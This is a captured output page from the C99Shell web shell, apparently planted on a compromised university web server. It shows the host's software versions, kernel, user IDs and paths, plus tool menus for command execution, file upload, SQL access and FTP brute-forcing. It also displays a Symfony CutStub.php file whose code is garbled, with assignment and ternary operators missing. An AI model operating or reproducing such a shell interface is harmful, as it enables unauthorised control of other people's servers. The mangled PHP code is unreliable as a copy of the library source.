!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/symfony/var-dumper/Caster/   drwxr-xr-x
Free 116.83 GB of 200.55 GB (58.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     CutStub.php (1.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\VarDumper\Caster;

use 
Symfony\Component\VarDumper\Cloner\Stub;

/**
 * Represents the main properties of a PHP variable, pre-casted by a caster.
 *
 * @author Nicolas Grekas <p@tchwork.com>
 */
class CutStub extends Stub
{
    public function 
__construct($value)
    {
        
$this->value $value;

        switch (
gettype($value)) {
            case 
'object':
                
$this->type self::TYPE_OBJECT;
                
$this->class get_class($value);
                
$this->cut = -1;
                break;

            case 
'array':
                
$this->type self::TYPE_ARRAY;
                
$this->class self::ARRAY_ASSOC;
                
$this->cut $this->value count($value);
                break;

            case 
'resource':
            case 
'unknown type':
                
$this->type self::TYPE_RESOURCE;
                
$this->handle = (int) $value;
                
$this->class = @get_resource_type($value);
                
$this->cut = -1;
                break;

            case 
'string':
                
$this->type self::TYPE_STRING;
                
$this->class preg_match('//u'$value) ? self::STRING_UTF8 self::STRING_BINARY;
                
$this->cut self::STRING_BINARY === $this->class strlen($value) : mb_strlen($value'UTF-8');
                
$this->value '';
                break;
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.024 ]--